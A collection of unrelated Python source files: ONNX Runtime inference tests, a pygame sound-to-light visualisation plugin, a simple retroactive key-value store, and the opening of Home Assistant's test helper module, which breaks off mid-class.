self.assertEqual(output_type, 'seq(map(int64,tensor(float)))')
output_expected = [{10: 1.0, 20: 0.0, 30: 3.0},
{10: 44.0, 20: 23.0, 30: 11.0}]
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(
self.get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, 8):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[8])
def testDictVectorizer(self):
sess = onnxrt.InferenceSession(
self.get_name("pipeline_vectorize.onnx"))
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "float_input")
input_type = str(sess.get_inputs()[0].type)
self.assertEqual(input_type, "map(int64,tensor(float))")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "variable1")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(float)")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [1, 1])
# Python type
x = {0: 25.0, 1: 5.13, 2: 0.0, 3: 0.453, 4: 5.966}
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[49.752754]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
xwrong = x.copy()
xwrong["a"] = 5.6
try:
res = sess.run([output_name], {input_name: xwrong})
except RuntimeError as e:
self.assertIn(
"Unexpected key type <class 'str'>, it cannot be linked to C type int64_t", str(e))
# numpy type
x = {np.int64(k): np.float32(v) for k, v in x.items()}
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[49.752754]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
x = {np.int64(k): np.float64(v) for k, v in x.items()}
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[49.752754]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
x = {np.int32(k): np.float64(v) for k, v in x.items()}
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[49.752754]], dtype=np.float32)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def testLabelEncoder(self):
sess = onnxrt.InferenceSession(self.get_name("LabelEncoder.onnx"))
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "input")
input_type = str(sess.get_inputs()[0].type)
self.assertEqual(input_type, "tensor(string)")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [1, 1])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "variable")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(int64)")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [1, 1])
# Array
x = np.array([['4']])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[3]], dtype=np.int64)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
# Python type
x = np.array(['4'], ndmin=2)
res = sess.run([output_name], {input_name: x})
output_expected = np.array([3], ndmin=2, dtype=np.int64)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
x = np.array(['4'], ndmin=2, dtype=np.object)
res = sess.run([output_name], {input_name: x})
output_expected = np.array([3], ndmin=2, dtype=np.int64)
np.testing.assert_allclose(
output_expected, res[0], rtol=1e-05, atol=1e-08)
def test_run_model_mlnet(self):
sess = onnxrt.InferenceSession(self.get_name("mlnet_encoder.onnx"))
names = [_.name for _ in sess.get_outputs()]
self.assertEqual(['C00', 'C12'], names)
c0 = np.array([5.], dtype=np.float32).reshape(1, 1)
c1 = np.array([b'A\0A\0', b"B\0B\0", b"C\0C\0"], np.void).reshape(1, 3)
res = sess.run(None, {'C0': c0, 'C1': c1})
mat = res[1]
total = mat.sum()
self.assertEqual(total, 2)
self.assertEqual(list(mat.ravel()),
list(np.array([[[0., 0., 0., 0.], [1., 0., 0., 0.], [0., 0., 1., 0.]]]).ravel()))
# In memory, the size of each element is fixed and equal to the
# longest element. We cannot use bytes because numpy is trimming
# every final 0 for strings and bytes before creating the array
# (to save space). It does not have this behaviour for void
# but as a result, numpy does not know anymore the size
# of each element, they all have the same size.
c1 = np.array([b'A\0A\0\0', b"B\0B\0", b"C\0C\0"],
np.void).reshape(1, 3)
res = sess.run(None, {'C0': c0, 'C1': c1})
mat = res[1]
total = mat.sum()
self.assertEqual(total, 0)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_BASIC)
# default should be basic optimization
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
sess = onnxrt.InferenceSession(self.get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
res = sess.run([], {'input1:0': a, 'input:0':b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(self.get_name("sequence_length.onnx"))
x = [np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(
self.get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(self.get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {"tensor": np.array(
[1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)), "input_seq": []})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
if __name__ == '__main__':
unittest.main()
|
sound_to_light.py | from VisualisationPlugin import VisualisationPlugin
import pygame
from DDRPi import FloorCanvas
import logging
import math
import colorsys
import numpy
import threading
import pyaudio
import scipy
import scipy.fftpack
import scipy.io.wavfile
import wave
from lib.controllers import ControllerInput
class SoundToLightVisualisationPlugin(VisualisationPlugin):
logger = logging.getLogger(__name__)
def __init__(self):
self.clock = pygame.time.Clock()
self.logger.info("Initialising SoundToLightVisualisationPlugin")
# Initialise the data structure
self.max_retained_samples = 100
self.fftsize = 512
self.data = numpy.array(numpy.zeros((self.max_retained_samples, self.fftsize / 2)), dtype=int)
self.scrolling = False
self.modes = ["scrolling", "latest"]
self.mode = self.modes[1]
self.chunk_policies = ["linear", "exp"]
self.chunk_policy = self.chunk_policies[1]
self.rolling_max = [0 for i in range(100)]
self.rolling_max_position = 0;
def start(self):
t_rec = threading.Thread(target=self.record) # make thread for record()
t_rec.daemon = True # daemon mode forces thread to quit with program
t_rec.start() # launch thread
def configure(self, config):
self.config = config
# Set the mode to the requested value, if present
try:
mode = self.config["mode"]
if mode.lower() in self.modes:
self.mode = mode.lower()
except (AttributeError, ValueError, KeyError):
pass
# Set the binning algorithm to the requested one, if present
try:
policy = self.config["policy"]
if policy.lower() in self.chunk_policies:
self.chunk_policy = policy.lower()
except (AttributeError, ValueError, KeyError):
pass
self.logger.info("Config: %s" % config)
"""
Handle the pygame event sent to the plugin from the main loop
"""
def handle_event(self, e):
if (e.type == pygame.JOYBUTTONDOWN):
if e.button == ControllerInput.BUTTON_A:
if len(self.modes) > 0:
self.mode = self.modes[0]
return None
if e.button == ControllerInput.BUTTON_B:
if len(self.modes) > 1:
self.mode = self.modes[1]
return None
if e.button == ControllerInput.BUTTON_X:
if len(self.chunk_policies) > 0:
self.chunk_policy = self.chunk_policies[0]
return None
if e.button == ControllerInput.BUTTON_Y:
if len(self.chunk_policies) > 1:
self.chunk_policy = self.chunk_policies[1]
return None
return e
def draw_frame(self, canvas):
canvas = self.draw_surface(canvas, pygame.time.get_ticks())
# Limit the frame rate.
# This sleeps so that at least 25ms has passed since tick()
# was last called. It is a no-op if the loop is running slow
# Draw whatever this plugin does
return canvas
def draw_splash(self, canvas):
canvas.set_colour((0, 0, 0))
w = canvas.get_width()
h = canvas.get_height()
# Draw something that looks vaguely like a EQ
for x in range(w):
# Two humps
height = h * 0.75 * math.cos(math.pi * float(x) / w) ** 2
# Decrease the humps
height *= math.cos((math.pi / 2.0) * float(x) / w)
canvas.draw_line(x, h, x, (h - 1) - int(height), (0xFF, 0, 0))
return canvas
def draw_surface(self, canvas):
return self.draw_surface(canvas, 0)
def draw_surface(self, canvas, t):
canvas.set_colour((0, 0, 0))
if self.data is not None:
max_average = max(255, int(sum(self.rolling_max) / len(self.rolling_max)))
block_values = []
if self.mode == "scrolling":
for x in range(canvas.get_width()):
# Skip a sample if it there isn't enough data available
if x >= len(self.data):
continue
latest = self.data[-x]
number_of_chunks = canvas.get_height()
# Make a copy of the array and reverse it -
# thus making the lowest frequency bin at [0] (traditionally left)
new_data = latest[::-1]
#self.logger.info("Input data %s" % new_data)
# Split it down into chunks, which is how wide the floor is.
# Using an exponential function helps approximate notes a bit better
# where all the lower ones are closely spaced, but the higher ones
# are further apart
new_data = self.chunk_data(new_data, canvas.get_height(), self.chunk_policy)
#self.logger.info("Chunked data: %s" % new_data)
peak_value = max(max(new_data), 50)
#self.logger.info("Peak value: %s" % peak_value)
# Store the rolling max
self.rolling_max[self.rolling_max_position] = peak_value
self.rolling_max_position += 1
if self.rolling_max_position >= len(self.rolling_max): self.rolling_max_position = 0
# Two options, either max, or mean
#standard_peak_value = max(max(self.rolling_max), 50) / 2
standard_peak_value = max(int(numpy.mean(self.rolling_max)), 255)
# Scale everything to the peak value to be in the range [0,1]
scaled_data = []
for i in range(number_of_chunks):
scaled_data.append(new_data[i] / float(standard_peak_value))
for y in range(number_of_chunks):
scaled_value = min(255, int(255 * scaled_data[y]))
canvas.set_pixel(x, y, (scaled_value, scaled_value, scaled_value))
elif self.mode == "latest":
latest = self.data[-1]
number_of_chunks = canvas.get_width()
# Make a copy of the array and reverse it -
# thus making the lowest frequency bin at [0] (traditionally left)
new_data = self.data[-1][::-1]
#self.logger.info("Input data %s" % new_data)
# Split it down into chunks, which is how wide the floor is.
# Using an exponential function helps approximate notes a bit better
# where all the lower ones are closely spaced, but the higher ones
# are further apart
new_data = self.chunk_data(new_data, canvas.get_width(), self.chunk_policy)
#self.logger.info("Chunked data: %s" % new_data)
peak_value = max(max(new_data), 50)
#self.logger.info("Peak value: %s" % peak_value)
# Store the rolling max
self.rolling_max[self.rolling_max_position] = peak_value
self.rolling_max_position += 1
if self.rolling_max_position >= len(self.rolling_max): self.rolling_max_position = 0
# Two options, either max, or mean
#standard_peak_value = max(max(self.rolling_max), 50) / 2
standard_peak_value = max(int(numpy.mean(self.rolling_max)), 50)
# Scale everything to the peak value
scaled_data = []
for i in range(number_of_chunks):
scaled_data.append(new_data[i] / float(standard_peak_value))
for column in range(canvas.get_width()):
height_int = int(canvas.get_height() * scaled_data[column])
for y in range(height_int):
canvas.set_pixel(column, canvas.get_height() - y,
(0xFF, max(0xFF - int(1.5 * y * (256. / (max(height_int, 1)))), 0), 0))
#self.draw_flame_to(canvas, column, 0, height_int)
self.clock.tick(25)
return canvas
def chunk_data(self, data, number_of_chunks, scaling="linear"):
chunks = []
if scaling == "linear":
elements_per_block = len(data) // number_of_chunks
for i in range(number_of_chunks):
count = 0;
total = 0
for x in range(elements_per_block):
count += 1
total += data[x + i * elements_per_block]
if count > 0:
chunks.append(total // count)
elif scaling == "exp":
# The lower frequencies are more closely packed, so don't
# evenly split the chunks, instead spread the lower frequencies
# out more following a rough exponential type curve
#self.logger.info("length of input - %d" % len(data))
# Calculate the distribution along the exponential
elements_per_block = [0 for i in range(number_of_chunks)]
e = 1.5
m = 0.5
for x in range(number_of_chunks):
elements_per_block[x] = e ** (x * m)
#self.logger.info("Exponential chunks: %s" % elements_per_block)
#self.logger.info("Exponential chunk total: %d" % sum(elements_per_block))
# Scale up so the total number of buckets is about the total
# we have to spread out
multiplier = len(data) / sum(elements_per_block)
for x in range(number_of_chunks):
elements_per_block[x] = max(1, int(multiplier * elements_per_block[x]))
#self.logger.info("Exponential chunks normalised: %s" % elements_per_block)
#self.logger.info("Exponential chunk total: %d" % sum(elements_per_block))
# Don't include the DC term
#elements_per_block[0] = 0
# Add the required number to each bucket and calculate the average
count = 0
for i in range(number_of_chunks):
elements = 0
total = 0
#self.logger.info("Putting %d elements in block %d" % (elements_per_block[i], i))
for j in range(elements_per_block[i]):
elements += 1
if count < len(data):
total += data[count]
#self.logger.info(" %s" % data[count])
count += 1
if elements > 0:
chunks.append(total // elements)
else:
chunks.append(0)
#self.logger.info("Exp chunk data: %s" % chunks)
return chunks;
def draw_flame_to(self, canvas, column, from_row, to_row):
delta = int(abs(to_row - from_row))
# self.logger.info("Flame height %d, %d" % (column, delta))
for row in range(delta):
canvas.set_pixel(column, from_row + row,
(0xFF, max(0xFF - int(1.5 * row * (256. / (max(delta, 1)))), 0), 0))
#canvas.set_pixel(column, from_row + row, (0xFF,0,0))
return None
# Reformats a color tuple, that uses the range [0, 1] to a 0xFF
# representation.
def reformat(self, color):
return int(round(color[0] * 255)), \
int(round(color[1] * 255)), \
int(round(color[2] * 255))
def record(self):
# Based off code from:
# http://www.swharden.com/blog/2010-06-19-simple-python-spectrograph-with-pygame/
rate = 12000 #try 5000 for HD data, 48000 for realtime
overlap = 5 #1 for raw, realtime - 8 or 16 for high-definition
self.logger.info("Opening Audio Stream")
p = pyaudio.PyAudio()
inStream = p.open(format=pyaudio.paInt16, channels=1, rate=rate, input=True)
linear = [0] * self.fftsize
while True:
#self.logger.info("Initiating Audio Stream Read")
linear = linear[self.fftsize / overlap:]
pcm = numpy.fromstring(inStream.read(self.fftsize / overlap), dtype=numpy.int16)
linear = numpy.append(linear, pcm)
# Convert the PCM wave format to FFT
ffty = scipy.fftpack.fft(linear)
ffty = abs(ffty[0:len(ffty) / 2]) / 500 #FFT is mirror-imaged
#print "MIN:\t%s\tMAX:\t%s"%(min(ffty),max(ffty))
# First shift all the data to the left
self.data = numpy.roll(self.data, -1, 0)
# Make the last column equal to the new data
self.data[-1] = ffty[::-1]
|
store.py | """ Library for a simple retroactively-updatable key-value store. """
import threading
import views
class RStore(object):
""" A retroactively-updatable interface. """
def __init__(self, cls):
"""
Initializes a new retroactively-updatable key-value store, wrapping around
the given storage class.
The underlying class must support the mutators delete() and insert(), as
well as the observer select().
Note that this initializer creates a new instance of cls to wrap.
Args:
cls (class): the base storage class
"""
self._store = cls()
def add(self, t, op, *args):
"""
Adds the operation op(args) to the underlying storage class at time t.
Assumes no other operation already exists at time t.
Args:
t (int): the time to add the operation
op (str): the operation to apply
args (tuple(object)): the arguments to op
"""
record = getattr(self._store, op)(*args)
if "insert" == op:
# Make callbacks
for cb in self._store._insert_callbacks:
threading.Thread(target=cb, args=(record,)).start()
def erase(self, t):
"""
Retroactively erases the operation added at time t.
Assumes that there is an operation to erase at time t.
Args:
t (int): the time at which to erase an operation
"""
record = self._store.delete(t)
# Make callbacks
for cb in self._store._delete_callbacks:
threading.Thread(target=cb, args=(record,)).start()
def observe(self, func, *args):
"""
Observe the store at present time, with the given observation function and
its arguments.
Args:
func (str): the observation function to invoke
args (tuple(object)): the arguments to the observation function
Returns the result of the observation.
"""
return getattr(self._store, func)(*args)
def __repr__(self):
return "RStore -> " + str(self._store)
class Store(object):
""" Contains the non-retroactive part of the key-value store. """
def __init__(self):
self._delete_callbacks = ()
self._insert_callbacks = ()
self._records = {}
# Mutators
def delete(self, key):
""" Deletes the Record for the given key and returns the deleted record.
Assumes key does exist in the Store.
Args:
key (hashable): the key whose Record we want to delete
"""
record = self._records[key]
del self._records[key]
return record
def insert(self, key, *values):
"""
Creates and inserts a Record for the given key, and returns the created
Record.
Assumes key does not already exist in the Store.
Args:
key (hashable): the key to use
values (tuple(object)): the value(s) to associate with the key
"""
record = Record(key, *values)
self._records[key] = record
return record
# Observers
def min(self, index=0):
"""
Returns the min of all the Records' values at the given index.
Args:
index (int): the index of the values over which we want to compute the
min. Defaults to 0, the keys.
"""
return views.Min(self, index)
def select(self, key):
"""
Returns the Record for the given key.
Assumes key does exist in the Store.
Args:
key (hashable): the key whose Record we want to retrieve
"""
return self._records[key]
def sum(self, index=0):
"""
Returns the sum of all the Records' values at the given index.
Args:
index (int): the index of the values we want to retrieve. Defaults to 0,
the keys.
"""
return views.Sum(self, index)
# Callbacks
def add_delete_callback(self, func):
self._delete_callbacks += (func,)
def add_insert_callback(self, func):
self._insert_callbacks += (func,)
# Magic functions
def __repr__(self):
records = (str(record) for record in self._records.values())
return "Store (%d elements):\n %s" % (
len(self._records), "\n ".join(records))
class Record(object):
"""
Contains a single record of information, such as about the key, value(s),
etc.
"""
def __init__(self, key, *values):
"""
Creates a Record for the provided key and value(s).
Args:
key (hashable): the key to use
values (tuple(object)): the value(s) to associate with the key
"""
self._key = key
self._values = (key,) + values
def key(self):
""" Returns the Record's key. """
return self._key
def values(self):
""" Returns the Record's associated value(s). """
return self._values
def __repr__(self):
return "Record[%s |-> %s]" % (self._key, str(self._values))
def get_test():
""" Testing store.py """
s = RStore(Store)
print("Empty RStore:", s)
t, op, k, v = 3, "insert", 1, 2
print("Adding %s(%s, %s) at time %d" % (op, k, v, t))
s.add(t, op, k, v)
print("State:", s)
print("Sum(0):", s.observe("sum"))
print("Sum(1):", s.observe("sum", 1))
rsum = s.observe("sum", 1)
print("Retrosum(1):", rsum)
rmin = s.observe("min", 1)
print("Retromin(1):", rmin)
t, op, k, v = 1, "insert", 4, 5
print("Adding %s(%s, %s) at time %d" % (op, k, v, t))
s.add(t, op, k, v)
print("State:", s)
print("Sum(0):", s.observe("sum"))
print("Sum(1):", s.observe("sum", 1))
print("Retrosum(1):", rsum)
print("Retromin(1):", rmin)
t, op, k, v = 8, "insert", -1, -2
print("Adding %s(%s, %s) at time %d" % (op, k, v, t))
s.add(t, op, k, v)
print("State:", s)
print("Sum(0):", s.observe("sum"))
print("Sum(1):", s.observe("sum", 1))
print("Retrosum(1):", rsum)
print("Retromin(1):", rmin)
t, op, k = 8, "delete", 1
print("Adding %s(%s) at time %d" % (op, k, t))
s.add(t, op, k)
print("State:", s)
print("Sum(0):", s.observe("sum"))
print("Sum(1):", s.observe("sum", 1))
print("Retrosum(1):", rsum)
print("Retromin(1):", rmin)
t = 4
print("Erasing op at time %d" % (t))
s.erase(t)
print("State:", s)
print("Sum(0):", s.observe("sum"))
print("Sum(1):", s.observe("sum", 1))
print("Retrosum(1):", rsum)
print("Retromin(1):", rmin)
return s
if __name__ == '__main__':
get_test()
|
common.py | """Test the helper method for writing tests."""
from __future__ import annotations
import asyncio
import collections
from collections import OrderedDict
from collections.abc import Awaitable, Collection
from contextlib import contextmanager
from datetime import datetime, timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import pathlib
import threading
import time
from time import monotonic
import types
from typing import Any
from unittest.mock import AsyncMock, Mock, patch
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa: F401
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import device_automation, recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
)
from homeassistant.components.mqtt.models import ReceiveMessage
from homeassistant.config import async_process_component_config
from homeassistant.const import (
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import BLOCK_LOG_TIMEOUT, HomeAssistant, State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.uuid as uuid_util
import homeassistant.util.yaml.loader as yaml_loader
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
async def async_get_device_automations(
hass: HomeAssistant,
automation_type: device_automation.DeviceAutomationType,
device_id: str,
) -> Any:
"""Get a device automation for a single device id."""
automations = await device_automation.async_get_device_automations(
hass, automation_type, [device_id]
)
return automations.get(device_id)
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
loop_stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
loop_stop_event.set()
orig_stop = hass.stop
hass._stopped = Mock(set=loop.stop)
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
loop_stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop, load_registries=True):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
async def async_wait_for_task_count(self, max_remaining_tasks: int = 0) -> None:
"""Block until at most max_remaining_tasks remain.
Based on HomeAssistant.async_block_till_done
"""
# To flush out any call_soon_threadsafe
await asyncio.sleep(0)
start_time: float | None = None
while len(self._pending_tasks) > max_remaining_tasks:
pending: Collection[Awaitable[Any]] = [
task for task in self._pending_tasks if not task.done()
]
self._pending_tasks.clear()
if len(pending) > max_remaining_tasks:
remaining_pending = await self._await_count_and_log_pending(
pending, max_remaining_tasks=max_remaining_tasks
)
self._pending_tasks.extend(remaining_pending)
if start_time is None:
# Avoid calling monotonic() until we know
# we may need to start logging blocked tasks.
start_time = 0
elif start_time == 0:
# If we have waited twice then we set the start
# time
start_time = monotonic()
elif monotonic() - start_time > BLOCK_LOG_TIMEOUT:
# We have waited at least three loops and new tasks
# continue to block. At this point we start
# logging all waiting tasks.
for task in pending:
_LOGGER.debug("Waiting for task: %s", task)
else:
self._pending_tasks.extend(pending)
await asyncio.sleep(0)
async def _await_count_and_log_pending(
self, pending: Collection[Awaitable[Any]], max_remaining_tasks: int = 0
) -> Collection[Awaitable[Any]]:
"""Block at most max_remaining_tasks remain and log tasks that take a long time.
Based on HomeAssistant._await_and_log_pending
"""
wait_time = 0
return_when = asyncio.ALL_COMPLETED
if max_remaining_tasks:
return_when = asyncio.FIRST_COMPLETED
while len(pending) > max_remaining_tasks:
_, pending = await asyncio.wait(
pending, timeout=BLOCK_LOG_TIMEOUT, return_when=return_when
)
if not pending or max_remaining_tasks:
return pending
wait_time += BLOCK_LOG_TIMEOUT
for task in pending:
_LOGGER.debug("Waited %s seconds for task: %s", wait_time, task)
return []
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.async_wait_for_task_count = types.MethodType(async_wait_for_task_count, hass)
hass._await_count_and_log_pending = types.MethodType(
_await_count_and_log_pending, hass
)
hass.data[loader.DATA_CUSTOM_COMPONENTS] = {}
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = "US/Pacific"
hass.config.units = METRIC_SYSTEM
hass.config.media_dirs = {"local": get_test_config_dir("media")}
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(
hass,
{
"_": "Not empty or else some bad checks for hass config in discovery.py breaks"
},
)
hass.config_entries._entries = {}
hass.config_entries._store._async_ensure_stop_listener = lambda: None
# Load the registries
if load_registries:
await asyncio.gather(
device_registry.async_load(hass),
entity_registry.async_load(hass),
area_registry.async_load(hass),
)
await hass.async_block_till_done()
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
